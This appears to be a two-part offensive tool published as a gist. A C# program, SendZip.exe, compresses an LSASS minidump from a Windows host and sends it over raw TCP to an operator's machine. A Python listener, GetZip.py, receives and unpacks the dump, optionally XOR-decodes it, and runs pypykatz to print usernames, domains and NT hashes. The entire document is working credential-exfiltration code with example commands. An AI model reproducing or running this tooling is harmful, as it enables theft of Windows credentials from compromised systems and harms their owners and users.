Exfiltrate an LSASS minidump over a raw TCP socket: SendZip.exe (C#) zips and sends the dump, GetZip.py (Python) receives, unpacks and optionally parses it. The transport is plain TCP with no encryption or authentication — run it through a tunnel you trust.
#!/usr/bin/env python3
# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] [--md5] [--parse]
# Requirements: pip3 install tqdm pypykatz
import hashlib
import os
import socket
import subprocess
import zipfile
from argparse import ArgumentParser

import tqdm
# Chunk size for every recv()/read() in this script, in bytes.
BUFFER_SIZE = 4 * 1024
# Separates <hostname> from <size> in the client's header (see SendZip.cs).
SEPARATOR = '|'
def parse_args():
    """Parse the command line: ``host port [--xor KEY] [--md5] [--parse]``.

    Returns:
        argparse.Namespace with ``host`` (str), ``port`` (int), ``xor`` (int 0-255 or None),
        ``md5`` (bool) and ``parse`` (bool).
    """
    cli = ArgumentParser()
    positional = (
        ('host', str, 'address to listen on'),
        ('port', int, 'port to listen on'),
    )
    for name, kind, text in positional:
        cli.add_argument(name, action='store', type=kind, help=text)
    # choices=range(256) makes argparse reject anything that is not a single-byte key.
    cli.add_argument('--xor', action='store', type=int, choices=range(256), default=None,
                     help='XOR-decrypt the dump with provided key')
    cli.add_argument('--md5', action='store_true', default=False, help='calculate MD5 hash')
    cli.add_argument('--parse', action='store_true', default=False,
                     help='parse the dump with pypykatz and print the results')
    return cli.parse_args()
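def _parse_header(head):
    """Split the first received chunk into (hostname, declared size, leftover payload bytes).

    The sender writes ``<hostname>|<size>`` as ASCII and then the ZIP bytes with nothing in
    between, so the first recv() may already contain the start of the archive. The hostname
    runs up to the first SEPARATOR, the size is the run of ASCII digits after it, and anything
    after the digits is payload. This relies on the archive not starting with an ASCII digit
    (a ZIP local file header begins with 'PK').

    Raises:
        ValueError: if the separator or the size digits are missing.
    """
    name, found, rest = head.partition(SEPARATOR.encode())
    if not found:
        raise ValueError('malformed header: separator not found')
    ndigits = len(rest) - len(rest.lstrip(b'0123456789'))
    if ndigits == 0:
        raise ValueError('malformed header: size missing')
    return name.decode('ascii', errors='replace'), int(rest[:ndigits]), rest[ndigits:]


def serve(host, port):
    """Accept a single TCP connection and save the ZIP archive it sends.

    Wire format (must stay in sync with SendZip.cs): the ASCII header
    ``COMPUTERNAME|<zip size in bytes>`` immediately followed by the raw ZIP bytes.

    Args:
        host: address to bind.
        port: TCP port to bind.

    Returns:
        Local filename the archive was written to.

    Raises:
        ValueError: if the header is malformed.

    Security notes:
        - No authentication and no transport encryption: anyone who can reach the port can
          connect and have a file written into the current directory, and the dump crosses the
          network in the clear. Bind to a loopback/tunnel endpoint (SSH or TLS) rather than
          0.0.0.0 on an untrusted network.
        - The hostname the peer sends is only printed; it is never used to build the output
          path, so the peer cannot choose where the file is written.
        - Exactly the declared number of bytes is read, so the peer cannot keep streaming past
          the size it announced (it can still announce an arbitrarily large size).
    """
    filename = '(unknown).zip'
    with socket.socket() as listener:
        # Lets the listener be restarted right after a previous run without TIME_WAIT delays.
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((host, port))
        listener.listen(5)
        print(f'Serving socket server on {host} port {port} ...')
        conn, addr = listener.accept()
        with conn:
            client_host, client_port = addr[0], addr[1]
            print(f'[+] Received connection from {client_host}:{client_port}')
            peer_name, filesize, payload = _parse_header(conn.recv(BUFFER_SIZE))
            print(f'[*] Peer identifies as {peer_name!r}, announced {filesize} bytes')
            # Anything beyond the declared size in the first chunk is not part of the archive.
            payload = payload[:filesize]
            print('[*] Started downloading LSASS dump...')
            with tqdm.tqdm(total=filesize, desc=filename, ncols=100, unit='B',
                           unit_scale=True, unit_divisor=1024) as pbar:
                with open(filename, 'wb') as f:
                    f.write(payload)
                    pbar.update(len(payload))
                    remaining = filesize - len(payload)
                    while remaining > 0:
                        chunk = conn.recv(min(BUFFER_SIZE, remaining))
                        if not chunk:
                            print(f'[-] Connection closed early, {remaining} bytes missing')
                            break
                        f.write(chunk)
                        pbar.update(len(chunk))
                        remaining -= len(chunk)
    return filename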
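def extract_zip(zipname, md5=False):
    """Unpack the received archive into a ``.dmp`` file and delete the archive.

    Args:
        zipname: path of the received ZIP.
        md5: when True, print the MD5 of the archive first so it can be compared with the
            value SendZip.exe printed on the source host. This is a transfer-integrity check
            only; on an unauthenticated channel MD5 gives no protection against tampering.

    Returns:
        Path of the written ``.dmp`` file (``zipname`` with its extension replaced).

    Raises:
        zipfile.BadZipFile: if the file is not a ZIP archive.
        ValueError: if the archive contains no members.

    Notes:
        Members are streamed straight into the target file instead of being extracted under
        their own names, so a member name inside the network-supplied archive never becomes a
        path on disk. When the archive holds several members the last one wins, as before.
        No cap is enforced on the decompressed size: a hostile archive can still fill the disk.
    """
    if md5:
        digest = hashlib.md5()
        with open(zipname, 'rb') as f:
            for chunk in iter(lambda: f.read(4096), b''):
                digest.update(chunk)
        print(f'[*] MD5: {digest.hexdigest()}')
    # Swap only the extension: the previous .replace('zip', 'dmp') rewrote every 'zip'
    # substring in the name (e.g. 'zipsrv.zip' -> 'dmpsrv.dmp').
    new_name = os.path.splitext(zipname)[0] + '.dmp'
    with zipfile.ZipFile(zipname, 'r') as zf:
        members = zf.namelist()
        if not members:
            raise ValueError(f'{zipname} contains no members')
        for name in members:
            with zf.open(name) as src, open(new_name, 'wb') as dst:
                for chunk in iter(lambda: src.read(4096), b''):
                    dst.write(chunk)
    print(f'[+] {zipname} was extracted to {new_name}')
    os.remove(zipname)
    return new_name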
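def xor(datafile, key):
    """XOR every byte of ``datafile`` in place with the single-byte ``key``.

    Args:
        datafile: path of the file to transform (rewritten in place, chunk by chunk, so the
            whole dump is never held in memory).
        key: integer 0..255.

    Raises:
        ValueError: if ``key`` is not in 0..255.

    Note:
        A single-byte XOR is obfuscation, not encryption: the key is recoverable from a single
        known plaintext byte and there is no integrity protection. SendZip.exe in this gist does
        not apply any XOR itself, so ``--xor`` only makes sense when the file handed to it was
        already XORed by whatever produced the dump.
    """
    if not isinstance(key, int) or not 0 <= key <= 255:
        raise ValueError(f'key must be an integer in 0..255, got {key!r}')
    # bytes.translate() applies the 256-entry table in C; the old per-byte generator took
    # seconds on a dump of tens of megabytes.
    table = bytes(i ^ key for i in range(256))
    with open(datafile, 'r+b') as f:
        while True:
            pos = f.tell()
            chunk = f.read(1 << 20)
            if not chunk:
                break
            f.seek(pos)
            f.write(chunk.translate(table))
    print(f'[+] {datafile} was XOR-decrypted with key 0x{key:02x}')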
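def _run_pypykatz(datafile, parsed_name):
    """Run ``pypykatz lsa minidump <datafile>`` and store its stdout in ``parsed_name``.

    Arguments are passed as a list (no shell), so file names can never be interpreted as shell
    syntax; the previous ``os.system(f"pypykatz ... {datafile} > {parsed_name}")`` would have
    been a command-injection sink had the names ever come from the peer.

    Returns:
        True when pypykatz ran, False when it is not installed.
    """
    with open(parsed_name, 'wb') as out:
        try:
            subprocess.run(['pypykatz', 'lsa', 'minidump', datafile], stdout=out, check=False)
        except FileNotFoundError:
            print('[-] pypykatz not found on PATH (pip3 install pypykatz)')
            return False
    return True


def _print_hashes(parsed_name):
    """Print the credential lines from the pypykatz output.

    Equivalent to the former pipeline
    ``grep -a -P 'Username: ' -A4 | grep -a -e Username -e Domain -e NT | grep -a -v None``:
    every line containing 'Username: ' and the four lines after it are selected; of those, only
    lines mentioning Username, Domain or NT are printed, minus any that contain 'None'.
    """
    with open(parsed_name, 'r', encoding='utf-8', errors='replace') as f:
        lines = f.read().splitlines()
    keep_until = -1
    for idx, line in enumerate(lines):
        if 'Username: ' in line:
            keep_until = idx + 4
        if idx > keep_until or 'None' in line:
            continue
        if any(token in line for token in ('Username', 'Domain', 'NT')):
            print(line)


if __name__ == '__main__':
    args = parse_args()
    zipname = serve(args.host, args.port)
    datafile = extract_zip(zipname, args.md5)
    if args.xor is not None:
        xor(datafile, args.xor)
    if args.parse:
        # Swap only the extension: a bare .replace('dmp', 'parsed') would also rewrite any
        # 'dmp' substring elsewhere in the name.
        parsed_name = os.path.splitext(datafile)[0] + '.parsed'
        print('[=] Parsing with pypykatz...')
        # Both the .dmp and the .parsed file now hold credential material on this host;
        # clean them up once they have served their purpose.
        if _run_pypykatz(datafile, parsed_name):
            print('[+] Hashes:')
            _print_hashes(parsed_name)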
// Usage: SendZip.exe 10.10.13.37 1337 C:\Windows\Temp\lsass.bin   (the minidump must already exist; this tool only reads and sends it)
// Requirements: System.IO.Compression
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Net.Sockets;
using System.Security.Cryptography;
namespace SendZip
{
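class Program
{
    /// <summary>
    /// Packs <paramref name="data"/> into an in-memory ZIP, prints its size and MD5, and
    /// streams it to <paramref name="host"/>:<paramref name="port"/> over a raw TCP connection.
    /// </summary>
    /// <param name="host">Receiver address (GetZip.py).</param>
    /// <param name="port">Receiver TCP port.</param>
    /// <param name="data">Raw minidump bytes.</param>
    /// <exception cref="ArgumentNullException"><paramref name="data"/> is null.</exception>
    /// <remarks>
    /// Wire format, matched by GetZip.py: the ASCII string "COMPUTERNAME|&lt;zip size in bytes&gt;"
    /// immediately followed by the raw ZIP bytes. There is no delimiter after the size, so the
    /// receiver relies on the archive not starting with an ASCII digit. Keep this in sync with
    /// the receiver's header parsing.
    ///
    /// Security: the connection is plain TCP. Nothing is encrypted or authenticated, so the dump
    /// and the hostname are readable by anyone on the path, and the printed MD5 only detects
    /// accidental corruption, not tampering. Send through a tunnel you trust.
    /// </remarks>
    static void SendZip(string host, int port, byte[] data)
    {
        if (data == null)
        {
            throw new ArgumentNullException(nameof(data));
        }
        if (data.Length == 0)
        {
            Console.WriteLine("[!] Dump is empty, sending it anyway");
        }

        byte[] compressedBytes;
        using (var outStream = new MemoryStream())
        {
            // leaveOpen: true keeps outStream usable after the archive is disposed, which is
            // when ZipArchive writes the central directory.
            using (var archive = new ZipArchive(outStream, ZipArchiveMode.Create, true))
            {
                // The member name is irrelevant: the receiver streams the member into its own
                // file name and never uses this one.
                var entry = archive.CreateEntry($"{Guid.NewGuid()}.bin");
                using (var entryStream = entry.Open())
                {
                    entryStream.Write(data, 0, data.Length);
                }
            }
            compressedBytes = outStream.ToArray();
        }
        Console.WriteLine($"[+] Minidump successfully packed, size {Math.Round(compressedBytes.Length / 1024.0 / 1024.0, 2)} MB");

        // Printed so the operator can compare it with the value GetZip.py --md5 prints.
        string zipHash;
        using (var md5 = MD5.Create())
        {
            zipHash = BitConverter.ToString(md5.ComputeHash(compressedBytes)).Replace("-", "");
        }
        Console.WriteLine($"[*] MD5: {zipHash}");

        // COMPUTERNAME is only an identifier for the operator; the receiver splits the header on
        // the first '|', so the name must not contain one (a NetBIOS name cannot, but be safe).
        string hostName = (Environment.GetEnvironmentVariable("COMPUTERNAME") ?? string.Empty).Replace("|", "_");
        byte[] header = Encoding.ASCII.GetBytes($"{hostName}|{compressedBytes.Length}");
        using (var tcpClient = new TcpClient(host, port))
        using (var netStream = tcpClient.GetStream())
        {
            netStream.Write(header, 0, header.Length);
            netStream.Write(compressedBytes, 0, compressedBytes.Length);
            netStream.Flush();
        }
        Console.WriteLine($"[+] Sent {compressedBytes.Length} bytes to {host}:{port}");
    }

    /// <summary>
    /// Entry point: <c>SendZip.exe &lt;host&gt; &lt;port&gt; &lt;path-to-minidump&gt;</c>.
    /// </summary>
    /// <remarks>
    /// The dump file is read, not created, and is left on disk afterwards; remove it yourself
    /// once the transfer has been verified on the receiving side.
    /// </remarks>
    static void Main(string[] args)
    {
        if (args.Length < 3)
        {
            Console.WriteLine("Usage: SendZip.exe <host> <port> <path-to-minidump>");
            Environment.ExitCode = 1;
            return;
        }
        var host = args[0];
        int port;
        if (!int.TryParse(args[1], out port) || port < 1 || port > 65535)
        {
            Console.WriteLine($"[-] Invalid port: {args[1]}");
            Environment.ExitCode = 1;
            return;
        }
        var data = File.ReadAllBytes(args[2]);
        SendZip(host, port, data);
    }
}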
}